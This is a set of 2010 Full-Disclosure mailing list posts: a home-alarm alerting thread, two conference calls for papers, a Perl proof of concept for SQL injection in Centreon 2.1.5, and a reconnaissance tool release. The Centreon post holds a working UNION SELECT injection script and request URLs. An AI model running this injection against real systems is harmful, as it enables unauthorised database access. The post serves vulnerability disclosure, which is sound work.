Can't hurt. I don't trust machines in DCs much less VPSs. An adversary with the resources and motivation to kill power, net, and jam GSM when they're pwning your house would probably be able to know about and take out your watchdog box in the same move. -Travis On Fri, Apr 2, 2010 at 9:46 AM, Haris Pilton wrote: > On Tuesday, March 30, 2010, T Biehn wrote: >> Nah, I'm saying a GSM jammer would block your prepaid cell signal. >> >> So if your adversary were to cut the power, cut the net AND jam GSM >> you'd be out of luck in getting notification. > > Very tru, tho u can combine this with a remote box that reacts iff it > no longer cant reach ur home box. Tht wy they cant just block outgoing > signals n be clear > >> >> You can get all fancy and have your program try all methods available. >> Cell, Wired Net, WIFI (throw an antennae on your roof,) pager, etc. >> >> -Travis >> >> On Tue, Mar 30, 2010 at 10:39 AM, wrote: >>> Good idea u saying also I should by a gsm jammer this a good idea I will >>> try. >>> >>> Sent from my iPhone >>> >>> On Mar 30, 2010, at 11:30 AM, T Biehn wrote: >>> Buy a prepaid cell, rig your comp & phone up to a battery backup. Breakout board on your Serial port, or from a USB-DB9 RS232 adapter. Have the text messaged banged out on the prepaid, rig wires from the breakout board to the cell phone, rig wires from your security sensors into your breakout board. App to listen on com port send a nice high signal to the pin connecting to your send key. Done. Like, 50$ for the phone incld. minutes. Like less than 20$ for a breakout board. Also, rig the ringer up to an input on the breakout board and you can call your phone to clear your FDE keys from RAM and kill your machine if you think the man is paying a visit once you get a text :) Some adversaries will cut net, hardline, sometimes power. Attacks: GSM jammers, which everyone has. -Travis On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar wrote: > > Try arduino + internet. > > 2010/3/27 >> >> Any one got any ides how I would program a system to call me from a >> voip network to alert me of a home security breach. >> >> Sent from my iPhone >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on http://pastebin.com/f6fd606da >>> >> >> >> >> -- >> FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C >> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on >> http://pastebin.com/f6fd606da >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 3rd CfP: INTERNET 2010 || September 20-25, 2010 - Valencia, Spain
INVITATION: = Please consider to contribute to and/or forward to the appropriate groups the following opportunity to submit and publish original scientific results. = == INTERNET 2010 | Call for Papers === CALL FOR PAPERS, TUTORIALS, PANELS INTERNET 2010: The Second International Conference on Evolving Internet September 20-25, 2010 - Valencia, Spain General page: http://www.iaria.org/conferences2010/INTERNET10.html Call for Papers: http://www.iaria.org/conferences2010/CfPINTERNET10.html Submission deadline: April 20, 2010 Sponsored by IARIA, www.iaria.org Extended versions of selected papers will be published in IARIA Journals: http://www.iariajournals.org Publisher: CPS ( see: http://www2.computer.org/portal/web/cscps ) Archived: IEEE CSDL (Computer Science Digital Library) and IEEE Xplore Submitted for indexing: Elsevier's EI Compendex Database, EI's Engineering Information Index Other indexes are being considered: INSPEC, DBLP, Thomson Reuters Conference Proceedings Citation Index Please note the Poster Forum and Work in Progress options. The topics suggested by the conference can be discussed in term of concepts, state of the art, research, standards, implementations, running experiments, applications, and industrial case studies. Authors are invited to submit complete unpublished papers, which are not under review in any other conference or journal in the following, but not limited to, topic areas. All tracks are open to both research and industry contributions, in terms of Regular papers, Posters, Work in progress, Technical/marketing/business presentations, Demos, Tutorials, and Panels. Before submission, please check and conform with the Editorial rules: http://www.iaria.org/editorialrules.html INTERNET 2010 Tracks (tracks' topics and submission details: see CfP on the site) Advanced Internet mechanisms Access: call admission control vs. QoE vs. structural QoS / capability-based access control vs. role-based access control vs. attribute-based access control; Routing and pricing models: BGP, pricing peering agreements using microeconomics, topological routing vs. table-based routing vs. network coding, power-efficient routing; Optimization in P2P/CDN networks: peer placement for streaming P2P, analysis of P2P networks; Traffic engineering: estimating traffic matrices, constrained routing, exponentially bounded burstness; Behavioral traffic recognition: identifying applications from traffic behavior; Traffic analysis: methods for analysis and visualization of multidimensional measurements, characterizing protocols; Software defined radio networks: low power signal processing methods, applications of machine learning; Cognitive radio: medium access, spatiotemporality, complexity, spectrum sharing and leasing, channel selection, multi-stage pricing, cyclostationary signatures, ! frame synchronization; Streaming vi deo: learning from video, techniques for in-network modulation; Location: statistical location, partial measurements, delay estimation Graph theory/topology/routing Internet support Information theory: distributed network coding, Shannon's entropy, Nash equilibrium; Optimization: LP, NLP, NeuroP, quadratic, convex programming, compressed sensing; Graph theory: random graphs, spectra graph theory, percolations and phase transitions, methods from statistical physics, geometric random graphs; Algebraic techniques: tensor analysis, matrix decomposition; Processing: signal processing techniques, equalization, point-process, source coding vs. network coding, recoverability; Statistical machine learning: probabilistic graphical models, classification, clustering, regression, classification, neural networks, support vector machines, decision forests; Game Theory/Microeconomic theory: social choice theory, equilibria, arbitrage and incentive oriented distributed mechanism design, cooperative games, and games on graphs; Stochastic network calculus; Fractal behavior and stability mechanisms; Kolmogorov complexity for performance evaluation; Complexity theory Internet security mechanisms Cryptography: design and analysis of cryptographic algorithms, applied cryptography, cryptographic protocols and functions; Specification, validation design of security and dependability: security and trust models, semantics and computational models for security and trust, business models in security management, security policies models, security architectures, formal methods for verification and certification, multi-level security specification; Vulnerabilities, attacks and risks: methods of detection, analysis, prevention, intrusion detection, tolerance, response and prevention, attacks and prevention of on-line fraud, denial of services attacks and prevention methods; Access Control: authentication and non-repudiation, accounting and audit, anonymity and pseudonymity; identity and trust managem
[Full-disclosure] 3rd CfP: ACCESS 2010 || September 20-25, 2010 - Valencia, Spain
INVITATION: = Please consider to contribute to and/or forward to the appropriate groups the following opportunity to submit and publish original scientific results. = == ACCESS 2010 | Call for Papers === CALL FOR PAPERS, TUTORIALS, PANELS ACCESS 2010: The First International Conferences on Access Networks, Services and Technologies September 20-25, 2010 - Valencia, Spain General page: http://www.iaria.org/conferences2010/ACCESS10.html Call for Papers: http://www.iaria.org/conferences2010/CfPACCESS10.html Submission deadline: April 20, 2010 Sponsored by IARIA, www.iaria.org Extended versions of selected papers will be published in IARIA Journals: http://www.iariajournals.org Publisher: CPS ( see: http://www2.computer.org/portal/web/cscps ) Archived: IEEE CSDL (Computer Science Digital Library) and IEEE Xplore Submitted for indexing: Elsevier's EI Compendex Database, EI's Engineering Information Index Other indexes are being considered: INSPEC, DBLP, Thomson Reuters Conference Proceedings Citation Index Please note the Poster Forum and Work in Progress options. The topics suggested by the conference can be discussed in term of concepts, state of the art, research, standards, implementations, running experiments, applications, and industrial case studies. Authors are invited to submit complete unpublished papers, which are not under review in any other conference or journal in the following, but not limited to, topic areas. All tracks are open to both research and industry contributions, in terms of Regular papers, Posters, Work in progress, Technical/marketing/business presentations, Demos, Tutorials, and Panels. Before submission, please check and conform with the Editorial rules: http://www.iaria.org/editorialrules.html ACCESS 2010 Tracks (tracks' topics and submission details: see CfP on the site) NEXTACCESS: Next generation access technologies Interactivity, unlimited access and full-scale media support; Energy-aware and efficiency-oriented technologies; Sustainable access network business (standard DSL vs. fiber vs. wireless access); 3G/4G wireless technologies; Multiservice access (DSL, fiber, WiMAX, POTS); FTTH; Ethernet P2P vs. xPON; FTTx with VDSL2, or Ethernet, or DOCSIS 3.0; Radio extension, 802.xx (Wi-Fi, WiMax, etc.); LTE, LTE-advanced; IMT-advanced networks; Mesh and relay networks (IEEE 802.11s, IEEE802.16j, etc.); Quality of experience (QoE) FEMTO: Femtocells-based access Femtocells architectures; Femtocells requirements ands specifications; Femtocells protocols; Femtocells services and applications; Traffic and QoS in Femtocells; Performance analysis in Femtocells; Femtocells control and management; Interoperability of Femtocells devices; Femtocells operation optimization; Femtocells specific solutions for mobility; OFDMA Femtocells: interference avoidance; Macrocell-Femto cell interference issues and mitigation; Macrocell-Femto cell handover strategies; WiMAX Fentocells; Standardization of Femtocells BROADBAND: Broadband wireless Internet access New architectures, technologies, protocols for broadband wireless access; QoS in mobile and broadband wireless access networks; Broadcast and multicast support; Physical and data link layer issues; Medium access control, SLA and QoS; Radio resource management and call admission control; Space-time coding for broadband wireless Internet; Modulation, coding and antennas (MIMO); Spectrum management; Scalability and reliability issues; Wireless mesh networks; Capacity planning and traffic engineering; Security and privacy issues; Interoperability aspects (fixed/mobile LANs/MANs, WANs); Experiences/lessons from recent deployments OPTICAL: Optical access networks Optical access network architecture design; Optical access network components and systems; New PON developments and testbeds; WDM and OFDM PON technologies; MAC and bandwidth allocation; RoF network architecture and MAC; RoF components and systems; Signal processing for new modulation formats; Optical spectral management; Multimode fiber technology and applications; Performance monitoring and diagnosis; Deployment and economic analysis MOBILE WIRELESS: Mobile wireless access Mobile Broadband Wireless Access; Wireless/Mobile Access Protocols; Wireless/Mobile Web Access; Ubiquitous and mobile access; Mobile/vehicular environment access; Multi-Homing and Vertical Handoff; Localization and tracking; Context-aware services and applications; Context-aware protocols and protocol architectures; Interactive applications; Mobile and Wireless Entertainment; Mobile Info-services; Wireless ad hoc and sensor networks DYNAMIC: Dynamic and cognitive access Dynamic spectrum access; Architectures and platforms for dynamic spectrum access networks; Spectrum sensing, measurement and models; Efficient and broadband spectrum sensing; Interference metrics and measurements; New spectrum protocols an
Re: [Full-disclosure] Security system
On Tuesday, March 30, 2010, T Biehn wrote: > Nah, I'm saying a GSM jammer would block your prepaid cell signal. > > So if your adversary were to cut the power, cut the net AND jam GSM > you'd be out of luck in getting notification. Very tru, tho u can combine this with a remote box that reacts iff it no longer cant reach ur home box. Tht wy they cant just block outgoing signals n be clear > > You can get all fancy and have your program try all methods available. > Cell, Wired Net, WIFI (throw an antennae on your roof,) pager, etc. > > -Travis > > On Tue, Mar 30, 2010 at 10:39 AM, wrote: >> Good idea u saying also I should by a gsm jammer this a good idea I will >> try. >> >> Sent from my iPhone >> >> On Mar 30, 2010, at 11:30 AM, T Biehn wrote: >> >>> Buy a prepaid cell, rig your comp & phone up to a battery backup. >>> Breakout board on your Serial port, or from a USB-DB9 RS232 adapter. >>> >>> Have the text messaged banged out on the prepaid, rig wires from the >>> breakout board to the cell phone, rig wires from your security sensors >>> into your breakout board. App to listen on com port send a nice high >>> signal to the pin connecting to your send key. >>> >>> Done. >>> >>> Like, 50$ for the phone incld. minutes. >>> Like less than 20$ for a breakout board. >>> >>> Also, rig the ringer up to an input on the breakout board and you can >>> call your phone to clear your FDE keys from RAM and kill your machine >>> if you think the man is paying a visit once you get a text :) >>> >>> Some adversaries will cut net, hardline, sometimes power. >>> >>> Attacks: GSM jammers, which everyone has. >>> >>> -Travis >>> >>> On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar wrote: Try arduino + internet. 2010/3/27 > > Any one got any ides how I would program a system to call me from a > voip network to alert me of a home security breach. > > Sent from my iPhone > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ >>> >>> >>> >>> -- >>> FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C >>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on >>> http://pastebin.com/f6fd606da >> > > > > -- > FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C > http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on > http://pastebin.com/f6fd606da > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability Centreon IT & Network Monitoring v2.1.5
#!/usr/bin/perl # //[PoC]-// # # Title : Centreon IT & Network Monitoring v2.1.5 - Injection SQL # Version : 2.1.5 # Author : Jonathan Salwan (j.sal...@sysdream.com) # # # [Vuln sql injection] # http://localhost/centreon/main.php?p=201&host_id=-1%20[SQL Injection]&o=p&min=1 # # http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1 # # # //---[Credit]---// # # http://www.sysdream.com/article.php?story_id=328§ion_id=78 # http://www.shell-storm.org # use LWP::UserAgent; my $url = 'http://localhost/centreon/index.php'; my $login = 'login'; my $paswd = 'pwd'; my $sql = 'http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1'; my $ua = LWP::UserAgent->new; my $response = $ua->get($url); my $cook = $response->header('Set-Cookie'); my $req2 = $ua->post($url, {useralias => $login, password => $paswd, submit => 'login'}, Cookie => $cook, Content-Type => 'application/x-www-form-urlencoded' ); my $response = $ua->get($sql, Cookie => $cook); my $content = $response->content(); open(FILE, '>sql-centreon.txt'); print FILE $content; close(FILE); print "\n[Answer SQL Injection]\n\n"; my $selection = system('cat sql-centreon.txt | grep ">Host"'); unlink('sql-centreon.txt'); print "\n"; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [TOOL] Version 0.2 of bing-ip2hosts released
I've just released version 0.2 of bing-ip2hosts. Introduction Bing.com is a search engine owned by Microsoft formerly known as MSN Search and Live Search. It has a unique feature to search for websites hosted on a specific IP address. This feature is can be used with the IP: parameter in the search query as shown in the image above. Bing-ip2hosts uses this feature to enumerate all hostnames which Bing has indexed for a specific IP address. This technique is considered best practice during the reconnaissance phase of a penetration test in order to discover a larger potential attack surface. Bing-ip2hosts is written in the Bash scripting language for Linux. This uses the mobile interface and no API key is required. Changes --- * You can enter a hostname not just an IP, eg. bing-ip2hosts foo.com * Uses /tmp instead of the current path for creating temporary files * Optional CSV output. Outputs the IP and hostname on each line, separated by a comma. * Optionally prefix hostnames with http:// so they can be right-clicked in the shell Example Usage - Pit one search engine against another $ bing-ip2hosts www.google.com 66.102.7.104 code.google.com desktop.google.ca desktop.google.com desktop.google.com.ar desktop.google.com.br desktop.google.cz desktop.google.es desktop.google.it desktop.google.jp desktop.google.nl desktop.google.sk ejabat.google.com finance.google.co.uk guru.google.co.th hp-eds.com otvety.google.ru toolbarqueries.google.com.sv toolbarqueries.google.de toolbarqueries.google.fr toolbarqueries.google.it www.desktop.google.be www.google.com www.google.uz Hope for undocumented facebook stuff and get disappointed $ ./bing-ip2hosts -p developers.facebook.com http://ar-ar.facebook.com http://clk.facebook.com http://da-dk.facebook.com http://de-de.facebook.com http://developers.connect.facebook.com http://developers.facebook.com http://developers.facebook.dk http://developers.facebook.es http://developers.facebook.pl http://developers.facebook.se http://developers.facebook.vn http://es-es.facebook.com http://it-it.facebook.com http://ja-jp.facebook.com http://nb-no.facebook.com http://pt-br.facebook.com http://stanford.facebook.com http://sv-se.facebook.com http://wiki.developers.facebook.com http://www.facebook.com Find some websites hosted by the BBC and wonder wtf they're doing $ ./bing-ip2hosts -p bbc.co.uk http://bbc.co.uk http://bbcstudiosandpostproduction.com http://censsa.co.uk http://cheapserve.co.uk http://cheekboneonline.com http://coconutloving.com http://cybusindustries.net http://desperaterussianhousewives.co.uk http://geocomtex.net http://haroldsaxon.co.uk http://itsnoteasybeinggreen.org http://kodiakjackcabins.com http://rudemasood.co.uk http://shamansburys.com http://tv-anytime.org http://venusclinic.co.uk http://www.bbc.co.uk Homepage http://www.morningstarsecurity.com/research/bing-ip2hosts If you find anything really interesting with bing-ip2hosts then I'd like to hear from you. -- Cheers, Andrew Horton MorningStar Security Mobile +64 (0) 272 646 959 Web http://www.morningstarsecurity.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/